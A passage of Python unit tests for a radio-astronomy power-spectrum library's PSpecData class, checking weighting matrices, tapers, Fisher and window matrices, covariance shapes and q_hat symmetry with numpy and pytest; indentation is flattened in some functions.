        self.ds.set_symmetric_taper(False)
        rmat_a = self.ds.R(key1)
        #check against independent solution built directly from uvtools.dspec
        bh_taper = np.sqrt(dspec.gen_window('bh7', Nfreq).reshape(1,-1))
        rmat = dspec.dayenu_mat_inv(x=self.ds.freqs[self.ds.spw_range[0]:self.ds.spw_range[1]],
                                    filter_centers=[0.], filter_half_widths=[100e-9], filter_factors=[1e-9])
        wmat = np.outer(np.diag(np.sqrt(self.ds.Y(key1))), np.diag(np.sqrt(self.ds.Y(key1))))
        rmat = np.linalg.pinv(wmat * rmat)
        # symmetric: sqrt(taper) on both sides; asymmetric: taper^2 on one side
        self.assertTrue(np.all(np.isclose(rmat_symmetric, bh_taper.T * rmat * bh_taper,atol=1e-6)))
        self.assertTrue(np.all(np.isclose(rmat_a, bh_taper.T ** 2. * rmat,atol=1e-6)))
        # the two tapering conventions must differ
        self.assertTrue(not np.all(np.isclose(rmat_symmetric, rmat_a,atol=1e-6)))
def test_labels(self):
"""
Test that dataset labels work.
"""
# Check that specifying labels does work
psd = pspecdata.PSpecData( dsets=[self.d[0], self.d[1],],
wgts=[self.w[0], self.w[1], ],
labels=['red', 'blue'])
np.testing.assert_array_equal( psd.x(('red', 24, 38)),
psd.x((0, 24, 38)) )
# Check specifying labels using dicts
dsdict = {'a':self.d[0], 'b':self.d[1]}
psd = pspecdata.PSpecData(dsets=dsdict, wgts=dsdict)
pytest.raises(ValueError, pspecdata.PSpecData, dsets=dsdict,
wgts=dsdict, labels=['a', 'b'])
# Check that invalid labels raise errors
pytest.raises(KeyError, psd.x, ('green', 24, 38))
    def test_parse_blkey(self):
        """
        parse_blkey(): split a (dset, baseline[, pol]) key into dataset index
        and baseline parts, resolving string labels to indices.
        """
        # make a double-pol UVData by relabelling one pol and concatenating
        uvd = copy.deepcopy(self.uvd)
        uvd.polarization_array[0] = -7
        uvd = uvd + self.uvd
        # check parse_blkey
        ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'])
        dset, bl = ds.parse_blkey((0, (24, 25)))
        assert dset == 0
        assert bl == (24, 25)
        # string label resolves to the dataset index; pol is kept in bl
        dset, bl = ds.parse_blkey(('red', (24, 25), 'xx'))
        assert dset == 0
        assert bl == (24, 25, 'xx')
        # check PSpecData.x works
        # without a pol the key returns both pols: (2, Nfreqs, Ntimes)
        assert ds.x(('red', (24, 25))).shape == (2, 64, 60)
        assert ds.x(('red', (24, 25), 'xx')).shape == (64, 60)
        assert ds.w(('red', (24, 25))).shape == (2, 64, 60)
        assert ds.w(('red', (24, 25), 'xx')).shape == (64, 60)
def test_str(self):
"""
Check that strings can be output.
"""
ds = pspecdata.PSpecData()
print(ds) # print empty psd
ds.add(self.uvd, None)
print(ds) # print populated psd
    def test_get_Q_alt(self):
        """
        Test the Q = dC/dp function: shape, Hermitian symmetry of the
        quadratic form, default Ndlys behavior, index-range errors, and
        FFT-vs-explicit agreement when Ndlys == Nfreqs.
        """
        vect_length = 50
        x_vect = np.random.normal(size=vect_length) \
               + 1.j * np.random.normal(size=vect_length)
        y_vect = np.random.normal(size=vect_length) \
               + 1.j * np.random.normal(size=vect_length)
        self.ds.spw_Nfreqs = vect_length
        for i in range(vect_length):
            Q_matrix = self.ds.get_Q_alt(i)
            # Test that if the number of delay bins hasn't been set
            # the code defaults to putting that equal to Nfreqs
            self.assertEqual(self.ds.spw_Ndlys, self.ds.spw_Nfreqs)
            xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
            yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
            xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
            # Test that Q matrix has the right shape
            self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
            # Test that x^t Q y == conj(y^t Q x)
            self.assertAlmostEqual(xQy, np.conjugate(yQx))
            # x^t Q x should be real
            self.assertAlmostEqual(np.imag(xQx), 0.)
        # A constant vector picks out the zero-delay mode: x^t Q x == Nfreq^2
        x_vect = np.ones(vect_length)
        Q_matrix = self.ds.get_Q_alt(vect_length//2)
        xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
        self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
        # Sending in sinusoids for x and y should give delta functions
        # Now do all the same tests from above but for a different number
        # of delay channels
        self.ds.set_Ndlys(vect_length-3)
        for i in range(vect_length-3):
            Q_matrix = self.ds.get_Q_alt(i)
            xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
            yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
            xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
            # Test that Q matrix has the right shape
            self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
            # Test that x^t Q y == conj(y^t Q x)
            self.assertAlmostEqual(xQy, np.conjugate(yQx))
            # x^t Q x should be real
            self.assertAlmostEqual(np.imag(xQx), 0.)
        x_vect = np.ones(vect_length)
        Q_matrix = self.ds.get_Q_alt((vect_length-2)//2-1)
        xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
        self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
        # Sending in sinusoids for x and y should give delta functions
        # Make sure that error is raised when asking for a delay mode outside
        # of the range of delay bins
        pytest.raises(IndexError, self.ds.get_Q_alt, vect_length-1)
        # Ensure that in the special case where the number of channels equals
        # the number of delay bins, the FFT method gives the same answer as
        # the explicit construction method
        multiplicative_tolerance = 0.001
        self.ds.set_Ndlys(vect_length)
        for alpha in range(vect_length):
            Q_matrix_fft = self.ds.get_Q_alt(alpha)
            Q_matrix = self.ds.get_Q_alt(alpha, allow_fft=False)
            Q_diff_norm = np.linalg.norm(Q_matrix - Q_matrix_fft)
            self.assertLessEqual(Q_diff_norm, multiplicative_tolerance)
        # Check for error handling: Ndlys may not exceed Nfreqs
        pytest.raises(ValueError, self.ds.set_Ndlys, vect_length+100)
def test_get_Q(self):
"""
Test the Q = dC_ij/dp function.
A general comment here:
I would really want to do away with try and exception statements. The reason to use them now
was that current unittests throw in empty datasets to these functions. Given that we are computing
the actual value of tau/freq/taper etc. we do need datasets! Currently, if there is no dataset,
Q_matrix is simply an identity matrix with same dimensions as that of vector length.
It will be very helpful if we can have more elegant solution for this.
"""
vect_length = 50
x_vect = np.random.normal(size=vect_length) \
+ 1.j * np.random.normal(size=vect_length)
y_vect = np.random.normal(size=vect_length) \
+ 1.j * np.random.normal(size=vect_length)
self.ds.spw_Nfreqs = vect_length
#Test if there is a warning if user does not pass the beam
key1 = (0, 24, 38)
key2 = (1, 24, 38)
uvd = copy.deepcopy(self.uvd)
ds_t = pspecdata.PSpecData(dsets=[uvd, uvd])
for i in range(vect_length):
try:
Q_matrix = self.ds.get_Q(i)
# Test that if the number of delay bins hasn't been set
# the code defaults to putting that equal to Nfreqs
self.assertEqual(self.ds.spw_Ndlys, self.ds.spw_Nfreqs)
except IndexError:
Q_matrix = np.ones((vect_length, vect_length))
xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
# Test that Q matrix has the right shape
self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
# Test that x^t Q y == conj(y^t Q x)
self.assertAlmostEqual(xQy, np.conjugate(yQx))
# x^t Q x should be real
self.assertAlmostEqual(np.imag(xQx), 0.)
x_vect = np.ones(vect_length)
try:
Q_matrix = self.ds.get_Q(vect_length/2)
except IndexError:
Q_matrix = np.ones((vect_length, vect_length))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
# Now do all the same tests from above but for a different number
# of delay channels
self.ds.set_Ndlys(vect_length-3)
for i in range(vect_length-3):
try:
Q_matrix = self.ds.get_Q(i)
except IndexError:
Q_matrix = np.ones((vect_length,vect_length))
xQy = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, y_vect))
yQx = np.dot(np.conjugate(y_vect), np.dot(Q_matrix, x_vect))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
# Test that Q matrix has the right shape
self.assertEqual(Q_matrix.shape, (vect_length, vect_length))
# Test that x^t Q y == conj(y^t Q x)
self.assertAlmostEqual(xQy, np.conjugate(yQx))
# x^t Q x should be real
self.assertAlmostEqual(np.imag(xQx), 0.)
x_vect = np.ones(vect_length)
try:
Q_matrix = self.ds.get_Q((vect_length-2)/2-1)
except IndexError:
Q_matrix = np.ones((vect_length,vect_length))
xQx = np.dot(np.conjugate(x_vect), np.dot(Q_matrix, x_vect))
self.assertAlmostEqual(xQx, np.abs(vect_length**2.))
# Make sure that error is raised when asking for a delay mode outside
# of the range of delay bins
pytest.raises(IndexError, self.ds.get_Q, vect_length-1)
    def test_get_integral_beam(self):
        """
        Test the integral of the beam and tapering function in Q: a missing
        beam must warn, and the returned matrix must be (Nfreqs x Nfreqs).
        """
        pol = 'xx'
        #Test if there is a warning if user does not pass the beam
        uvd = copy.deepcopy(self.uvd)
        ds_t = pspecdata.PSpecData(dsets=[uvd, uvd])
        ds = pspecdata.PSpecData(dsets=[uvd, uvd], beam=self.bm)
        with warnings.catch_warnings(record=True) as w:
            ds_t.get_integral_beam(pol)
        assert len(w) > 0
        try:
            integral_matrix = ds.get_integral_beam(pol)
            # Test that if the number of delay bins hasn't been set
            # the code defaults to putting that equal to Nfreqs
            self.assertEqual(ds.spw_Ndlys, ds.spw_Nfreqs)
        except IndexError:
            # fallback mirrors the pattern used in test_get_Q
            integral_matrix = np.ones((ds.spw_Ndlys, ds.spw_Ndlys))
        # Test that integral matrix has the right shape
        self.assertEqual(integral_matrix.shape, (ds.spw_Nfreqs, ds.spw_Nfreqs))
    def test_get_unnormed_E(self):
        """
        Test the E function: error on unset Ndlys, Hermiticity when R1 == R2,
        shape with exact_norm, E^{12,dagger} == E^{21} for R1 != R2, and the
        one-delay identity-weighting special case.
        """
        # Test that error is raised if spw_Ndlys is not set
        uvd = copy.deepcopy(self.uvd)
        ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'])
        ds.spw_Ndlys = None
        pytest.raises(ValueError, ds.get_unnormed_E, 'placeholder', 'placeholder')
        # Test that if R1 = R2, then the result is Hermitian
        ds.spw_Ndlys = 7
        random_R = generate_pos_def_all_pos(ds.spw_Nfreqs)
        wgt_matrix_dict = {} # The keys here have no significance except they are formatted right
        wgt_matrix_dict[('red', (24, 25))] = random_R
        wgt_matrix_dict[('blue', (24, 25))] = random_R
        ds.set_R(wgt_matrix_dict)
        E_matrices = ds.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)))
        multiplicative_tolerance = 0.0000001
        for matrix in E_matrices:
            diff_norm = np.linalg.norm(matrix.T.conj() - matrix)
            self.assertLessEqual(diff_norm, multiplicative_tolerance)
        #Test for the correct shape when exact_norm is True
        ds_c = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'], beam=self.bm)
        ds_c.spw_Ndlys = 10
        random_R = generate_pos_def_all_pos(ds_c.spw_Nfreqs)
        wgt_matrix_dict = {}
        wgt_matrix_dict[('red', (24, 25))] = random_R
        wgt_matrix_dict[('blue', (24, 25))] = random_R
        ds_c.set_R(wgt_matrix_dict)
        E_matrices = ds_c.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)), exact_norm=True, pol='xx')
        # one (Nfreqs x Nfreqs) E matrix per delay bin
        self.assertEqual(E_matrices.shape, (ds_c.spw_Ndlys, ds_c.spw_Nfreqs, ds_c.spw_Nfreqs))
        # Test that if R1 != R2, then i) E^{12,dagger} = E^{21}
        random_R2 = generate_pos_def_all_pos(ds.spw_Nfreqs)
        wgt_matrix_dict = {}
        wgt_matrix_dict[('red', (24, 25))] = random_R
        wgt_matrix_dict[('blue', (24, 25))] = random_R2
        ds.set_R(wgt_matrix_dict)
        E12_matrices = ds.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)))
        E21_matrices = ds.get_unnormed_E(('blue', (24, 25)), ('red', (24, 25)))
        multiplicative_tolerance = 0.0000001
        for mat12,mat21 in zip(E12_matrices,E21_matrices):
            diff_norm = np.linalg.norm(mat12.T.conj() - mat21)
            self.assertLessEqual(diff_norm, multiplicative_tolerance)
        # Test that if there is only one delay bin and R1 = R2 = I, then
        # the E matrices are all 0.5s except in flagged channels.
        ds.spw_Ndlys = 1
        wgt_matrix_dict = {}
        wgt_matrix_dict[('red', (24, 25))] = np.eye(ds.spw_Nfreqs)
        wgt_matrix_dict[('blue', (24, 25))] = np.eye(ds.spw_Nfreqs)
        # Y() carries the flagging pattern; a zero diagonal entry = flagged.
        flags1 = np.diag(ds.Y(('red', (24, 25))))
        flags2 = np.diag(ds.Y(('blue', (24, 25))))
        ds.set_R(wgt_matrix_dict)
        E_matrices = ds.get_unnormed_E(('red', (24, 25)), ('blue', (24, 25)))
        multiplicative_tolerance = 0.0000001
        for matrix in E_matrices:
            for i in range(ds.spw_Nfreqs):
                for j in range(ds.spw_Nfreqs):
                    if flags1[i] * flags2[j] == 0: # either channel flagged
                        self.assertAlmostEqual(matrix[i,j], 0.)
                    else:
                        self.assertAlmostEqual(matrix[i,j], 0.5)
    def test_cross_covar_model(self):
        """
        cross_covar_model(): input validation, matrix shapes, and the
        Hermiticity/conjugation relations between the four conj_1/conj_2
        combinations for both auto- and cross-key covariances.
        """
        uvd = copy.deepcopy(self.uvd)
        ds = pspecdata.PSpecData(dsets=[uvd, uvd], wgts=[None, None], labels=['red', 'blue'])
        key1 = ('red', (24, 25), 'xx')
        key2 = ('blue', (25, 38), 'xx')
        # invalid model string and non-key second argument must raise
        pytest.raises(ValueError, ds.cross_covar_model, key1, key2, model='other_string')
        pytest.raises(AssertionError, ds.cross_covar_model, key1, 'a_string')
        conj1_conj1 = ds.cross_covar_model(key1, key1, conj_1=True, conj_2=True)
        conj1_real1 = ds.cross_covar_model(key1, key1, conj_1=True, conj_2=False)
        real1_conj1 = ds.cross_covar_model(key1, key1, conj_1=False, conj_2=True)
        real1_real1 = ds.cross_covar_model(key1, key1, conj_1=False, conj_2=False)
        # Check matrix sizes
        for matrix in [conj1_conj1, conj1_real1, real1_conj1, real1_real1]:
            self.assertEqual(matrix.shape, (ds.spw_Nfreqs, ds.spw_Nfreqs))
        for j in range(ds.spw_Nfreqs):
            for k in range(ds.spw_Nfreqs):
                # Check that the matrices that ought to be Hermitian are indeed Hermitian
                self.assertAlmostEqual(conj1_real1.conj()[k,j], conj1_real1[j,k])
                self.assertAlmostEqual(real1_conj1.conj()[k,j], real1_conj1[j,k])
                # Check that real_real and conj_conj are complex conjugates of each other
                # Also check that they are symmetric
                self.assertAlmostEqual(real1_real1.conj()[j,k], conj1_conj1[j,k])
                self.assertAlmostEqual(real1_real1[k,j], real1_real1[j,k])
                self.assertAlmostEqual(conj1_conj1[k,j], conj1_conj1[j,k])
        real1_real2 = ds.cross_covar_model(key1, key2, conj_1=False, conj_2=False)
        real2_real1 = ds.cross_covar_model(key2, key1, conj_1=False, conj_2=False)
        conj1_conj2 = ds.cross_covar_model(key1, key2, conj_1=True, conj_2=True)
        conj2_conj1 = ds.cross_covar_model(key2, key1, conj_1=True, conj_2=True)
        conj1_real2 = ds.cross_covar_model(key1, key2, conj_1=True, conj_2=False)
        conj2_real1 = ds.cross_covar_model(key2, key1, conj_1=True, conj_2=False)
        real1_conj2 = ds.cross_covar_model(key1, key2, conj_1=False, conj_2=True)
        real2_conj1 = ds.cross_covar_model(key2, key1, conj_1=False, conj_2=True)
        # And some similar tests for cross covariances
        for j in range(ds.spw_Nfreqs):
            for k in range(ds.spw_Nfreqs):
                self.assertAlmostEqual(real1_real2[k,j], real2_real1[j,k])
                self.assertAlmostEqual(conj1_conj2[k,j], conj2_conj1[j,k])
                self.assertAlmostEqual(conj1_real2.conj()[k,j], conj2_real1[j,k])
                self.assertAlmostEqual(real1_conj2.conj()[k,j], real2_conj1[j,k])
    def test_get_unnormed_V(self):
        """
        get_unnormed_V(): check the band covariance has shape
        (Ndlys x Ndlys) and is Hermitian to within a relative tolerance.
        """
        self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, labels=['red', 'blue'])
        key1 = ('red', (24, 25), 'xx')
        key2 = ('blue', (25, 38), 'xx')
        self.ds.spw_Ndlys = 5
        V = self.ds.get_unnormed_V(key1, key2)
        # Check size
        self.assertEqual(V.shape, (self.ds.spw_Ndlys,self.ds.spw_Ndlys))
        # Test hermiticity. Generally this is only good to about 1 part in 10^15.
        # If this is an issue downstream, should investigate more in the future.
        tol = 1e-10
        # NOTE(review): this divides elementwise by |V|; a zero entry in V
        # would make this 0/0 — presumably V is dense here. Verify if flaky.
        frac_non_herm = abs(V.conj().T - V)/abs(V)
        for i in range(self.ds.spw_Ndlys):
            for j in range(self.ds.spw_Ndlys):
                self.assertLessEqual(frac_non_herm[i,j], tol)
    def test_get_MW(self):
        """
        get_MW(): normalization matrix M and window matrix W for each
        supported mode, plus rejection of unknown/disabled modes.
        """
        n = 17
        random_G = generate_pos_def_all_pos(n)
        random_H = generate_pos_def_all_pos(n)
        random_V = generate_pos_def_all_pos(n)
        # unknown mode string and unsupported exact_norm combination
        pytest.raises(AssertionError, self.ds.get_MW, random_G, random_H, mode='L^3')
        pytest.raises(NotImplementedError, self.ds.get_MW, random_G, random_H, mode='H^-1', exact_norm=True)
        for mode in ['H^-1', 'V^-1/2', 'I', 'L^-1']:
            if mode == 'H^-1':
                # Test that if we have full-rank matrices, the resulting window functions
                # are indeed delta functions
                M, W = self.ds.get_MW(random_G, random_H, mode=mode)
                Hinv = np.linalg.inv(random_H)
                for i in range(n):
                    self.assertAlmostEqual(W[i,i], 1.)
                    for j in range(n):
                        self.assertAlmostEqual(M[i,j], Hinv[i,j])
                # When the matrices are not full rank, test that the window functions
                # are at least properly normalized.
                deficient_H = np.ones((3,3))
                M, W = self.ds.get_MW(deficient_H, deficient_H, mode=mode)
                norm = np.sum(W, axis=1)
                for i in range(3):
                    self.assertAlmostEqual(norm[i], 1.)
                # Check that the method ignores G
                M, W = self.ds.get_MW(random_G, random_H, mode=mode)
                M_other, W_other = self.ds.get_MW(random_H, random_H, mode=mode)
                for i in range(n):
                    for j in range(n):
                        self.assertAlmostEqual(M[i,j], M_other[i,j])
                        self.assertAlmostEqual(W[i,j], W_other[i,j])
            elif mode == 'V^-1/2':
                # Test that we are checking for the presence of a covariance matrix
                pytest.raises(ValueError, self.ds.get_MW, random_G, random_H, mode=mode)
                # Test that the error covariance is diagonal
                M, W = self.ds.get_MW(random_G, random_H, mode=mode, band_covar=random_V)
                band_covar = np.dot(M, np.dot(random_V, M.T))
                self.assertEqual(diagonal_or_not(band_covar), True)
            elif mode == 'I':
                # Test that the norm matrix is diagonal
                M, W = self.ds.get_MW(random_G, random_H, mode=mode)
                self.assertEqual(diagonal_or_not(M), True)
            elif mode == 'L^-1':
                # Test that Cholesky mode is disabled
                pytest.raises(NotImplementedError,
                              self.ds.get_MW, random_G, random_H, mode=mode)
            # Test sizes for everyone
            self.assertEqual(M.shape, (n,n))
            self.assertEqual(W.shape, (n,n))
            # Window function matrices should have each row sum to unity
            # regardless of the mode chosen
            test_norm = np.sum(W, axis=1)
            for norm in test_norm:
                self.assertAlmostEqual(norm, 1.)
def test_cov_q(self, ndlys=13):
"""
Test that q_hat_cov has the right shape and accepts keys in correct
format. Also validate with arbitrary number of delays.
"""
for d in self.d:
d.flag_array[:] = False #ensure that there are no flags!
d.select(times=np.unique(d.time_array)[:10], frequencies=d.freq_array[0, :16])
for d_std in self.d_std:
d_std.flag_array[:] = False
d_std.select(times=np.unique(d_std.time_array)[:10], frequencies=d_std.freq_array[0, :16])
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, dsets_std=self.d_std)
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, dsets_std=self.d_std)
Ntime = self.ds.Ntimes
self.ds.set_Ndlys(ndlys)
# Here is the analytic covariance matrix...
chan_x, chan_y = np.meshgrid(range(self.ds.Nfreqs), range(self.ds.Nfreqs))
cov_analytic = np.zeros((self.ds.spw_Ndlys, self.ds.spw_Ndlys), dtype=np.complex128)
for alpha in range(self.ds.spw_Ndlys):
for beta in range(self.ds.spw_Ndlys):
cov_analytic[alpha, beta] = np.exp(-2j*np.pi*(alpha-beta)*(chan_x-chan_y)/self.ds.spw_Ndlys).sum()
key1 = (0, 24, 38)
key2 = (1, 25, 38)
#print(cov_analytic)
for input_data_weight in ['identity','iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
#check error raised
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
for taper in taper_selection:
qc = self.ds.cov_q_hat(key1,key2,model='dsets')
self.assertTrue(np.allclose(np.array(list(qc.shape)),
np.array([self.ds.Ntimes, self.ds.spw_Ndlys, self.ds.spw_Ndlys]), atol=1e-6))
qc = self.ds.cov_q_hat(key1,key2,model='empirical')
self.assertTrue(np.allclose(np.array(list(qc.shape)),
np.array([self.ds.Ntimes, self.ds.spw_Ndlys, self.ds.spw_Ndlys]), atol=1e-6))
"""
Now test that analytic Error calculation gives Nchan^2
"""
self.ds.set_weighting('identity')
qc = self.ds.cov_q_hat(key1, key2, model='dsets')
self.assertTrue(np.allclose(qc,
np.repeat(cov_analytic[np.newaxis, :, :], self.ds.Ntimes, axis=0), atol=1e-6))
"""
Test lists of keys
"""
self.ds.set_weighting('identity')
qc=self.ds.cov_q_hat([key1], [key2], time_indices=[0], model='dsets')
self.assertTrue(np.allclose(qc,
np.repeat(cov_analytic[np.newaxis, :, :], self.ds.Ntimes, axis=0), atol=1e-6))
self.assertRaises(ValueError, self.ds.cov_q_hat, key1, key2, time_indices=200)
self.assertRaises(ValueError, self.ds.cov_q_hat, key1, key2, time_indices="watch out!")
def test_cov_p_hat(self):
"""
Test cov_p_hat, verify on identity.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w, dsets_std=self.d_std)
cov_p = self.ds.cov_p_hat(np.sqrt(6.)*np.identity(10),np.array([5.*np.identity(10)]))
for p in range(10):
for q in range(10):
if p == q:
self.assertTrue(np.isclose(30., cov_p[0, p, q], atol=1e-6))
else:
self.assertTrue(np.isclose(0., cov_p[0, p, q], atol=1e-6))
    def test_R_truncation(self):
        """
        Test truncation of R-matrices. These should give a q_hat that is all
        zeros outside of the with f-start and f-end.
        """
        self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
        Nfreq = self.ds.spw_Nfreqs
        Ntime = self.ds.Ntimes
        Ndlys = Nfreq - 3
        self.ds.spw_Ndlys = Ndlys
        # Set baselines to use for tests
        key1 = (0, 24, 38)
        key2 = (1, 25, 38)
        key3 = [(0, 24, 38), (0, 24, 38)]
        key4 = [(1, 25, 38), (1, 25, 38)]
        # dayenu weighting needs per-key r_params before R() can be built
        rpk1 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
        rpk2 = {'filter_centers':[0.],'filter_half_widths':[100e-9],'filter_factors':[1e-9]}
        self.ds.set_weighting('dayenu')
        self.ds.set_r_param(key1,rpk1)
        self.ds.set_r_param(key2,rpk2)
        ds1 = copy.deepcopy(self.ds)
        # Truncated spw + filter extension makes R rectangular:
        # (spw_Nfreqs_truncated x spw_Nfreqs_full).
        ds1.set_spw((10,Nfreq-10))
        ds1.set_symmetric_taper(False)
        ds1.set_filter_extension([10,10])
        ds1.set_filter_extension((10,10))
        rm1 = self.ds.R(key1)
        rm2 = ds1.R(key2)
        rm3 = ds1.R(key1)
        self.assertTrue(np.shape(rm2) == (ds1.spw_Nfreqs, self.ds.spw_Nfreqs))
        #check that all values that are not truncated match values of untruncated matrix.
        self.assertTrue(np.all(np.isclose(rm1[10:-10], rm2, atol=1e-6)))
        #make sure no errors are thrown by get_V, get_E, etc...
        ds1.get_unnormed_E(key1, key2)
        ds1.get_unnormed_V(key1, key2)
        h=ds1.get_H(key1, key2)
        g=ds1.get_G(key1, key2)
        ds1.get_MW(g, h)
        #make sure identity weighting isn't broken.
        self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
        ds1 = copy.deepcopy(self.ds)
        ds1.set_spw((10,Nfreq-10))
        ds1.set_weighting('identity')
        ds1.set_symmetric_taper(False)
        ds1.set_filter_extension([10,10])
        rm1 = ds1.R(key1)
def test_q_hat(self):
"""
Test that q_hat has right shape and accepts keys in the right format.
"""
# Set weights and pack data into PSpecData
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.Nfreqs
Ntime = self.ds.Ntimes
Ndlys = Nfreq - 3
self.ds.spw_Ndlys = Ndlys
# Set baselines to use for tests
key1 = (0, 24, 38)
key2 = (1, 25, 38)
key3 = [(0, 24, 38), (0, 24, 38)]
key4 = [(1, 25, 38), (1, 25, 38)]
for input_data_weight in ['identity', 'iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
# Loop over list of taper functions
for taper in taper_selection:
self.ds.set_taper(taper)
# Calculate q_hat for a pair of baselines and test output shape
q_hat_a = self.ds.q_hat(key1, key2)
self.assertEqual(q_hat_a.shape, (Ndlys, Ntime))
# Check that swapping x_1 <-> x_2 results in complex conj. only
q_hat_b = self.ds.q_hat(key2, key1)
q_hat_diff = np.conjugate(q_hat_a) - q_hat_b
for i in range(Ndlys):
for j in range(Ntime):
self.assertAlmostEqual(q_hat_diff[i,j].real,
q_hat_diff[i,j].real)
self.assertAlmostEqual(q_hat_diff[i,j].imag,
q_hat_diff[i,j].imag)
# Check that lists of keys are handled properly
q_hat_aa = self.ds.q_hat(key1, key4) # q_hat(x1, x2+x2)
q_hat_bb = self.ds.q_hat(key4, key1) # q_hat(x2+x2, x1)
q_hat_cc = self.ds.q_hat(key3, key4) # q_hat(x1+x1, x2+x2)
# Effectively checks that q_hat(2*x1, 2*x2) = 4*q_hat(x1, x2)
for i in range(Ndlys):
for j in range(Ntime):
self.assertAlmostEqual(q_hat_a[i,j].real,
0.25 * q_hat_cc[i,j].real)
self.assertAlmostEqual(q_hat_a[i,j].imag,
0.25 * q_hat_cc[i,j].imag)
self.ds.spw_Ndlys = Nfreq
# Check that the slow method is the same as the FFT method
for input_data_weight in ['identity', 'iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
# Loop over list of taper functions
for taper in taper_selection:
self.ds.set_taper(taper)
q_hat_a_slow = self.ds.q_hat(key1, key2, allow_fft=False)
q_hat_a = self.ds.q_hat(key1, key2, allow_fft=True)
self.assertTrue(np.isclose(np.real(q_hat_a/q_hat_a_slow), 1).all())
self.assertTrue(np.isclose(np.imag(q_hat_a/q_hat_a_slow), 0, atol=1e-6).all())
#Test if error is raised when one tried FFT approach on exact_norm
pytest.raises(NotImplementedError, self.ds.q_hat, key1, key2, exact_norm=True, allow_fft = True)
def test_get_H(self):
"""
Test Fisher/weight matrix calculation.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.Nfreqs
multiplicative_tolerance = 1.
key1 = (0, 24, 38)
key2 = (1, 25, 38)
for input_data_weight in ['identity','iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
for taper in taper_selection:
self.ds.set_taper(taper)
self.ds.set_Ndlys(Nfreq//3)
H = self.ds.get_H(key1, key2)
self.assertEqual(H.shape, (Nfreq//3, Nfreq//3)) # Test shape
self.ds.set_Ndlys()
H = self.ds.get_H(key1, key2)
self.assertEqual(H.shape, (Nfreq, Nfreq)) # Test shape
def test_get_G(self):
"""
Test Fisher/weight matrix calculation.
"""
self.ds = pspecdata.PSpecData(dsets=self.d, wgts=self.w)
Nfreq = self.ds.Nfreqs
multiplicative_tolerance = 1.
key1 = (0, 24, 38)
key2 = (1, 25, 38)
for input_data_weight in ['identity','iC', 'dayenu']:
self.ds.set_weighting(input_data_weight)
if input_data_weight == 'dayenu':
pytest.raises(ValueError,self.ds.R, key1)
rpk = {'filter_centers':[0.],'filter_half_widths':[0.],'filter_factors':[0.]}
self.ds.set_r_param(key1,rpk)
self.ds.set_r_param(key2,rpk)
for taper in taper_selection:
self.ds.clear_cache()
self.ds.set_taper(taper)
#print 'input_data_weight', input_data_weight
self.ds.set_Ndlys(Nfreq-2)
G = self.ds.get_G(key1, key2)
self.assertEqual(G.shape, (Nfreq-2, Nfreq-2)) # Test shape
#print np.min(np.abs(G)), np.min(np.abs(np.linalg.eigvalsh(G)))
matrix_scale = np.min(np.abs(np.linalg.eigvalsh(G)))
if input_data_weight == 'identity':
# In the identity case, there are three special properties
# that are respected:
# i) Symmetry: G_ab = G_ba
# ii) Cylic property: G = (1/2) tr[R1 Q_a R2 Q_b]
# = (1/2) tr[R2 Q_b R1 Q_a]
# iii) All elements of G are positive.
# Test symmetry
anti_sym_norm = np.linalg.norm(G - G.T)
self.assertLessEqual(anti_sym_norm,
matrix_scale * multiplicative_tolerance)
# Test cyclic property of trace, where key1 and key2 can be
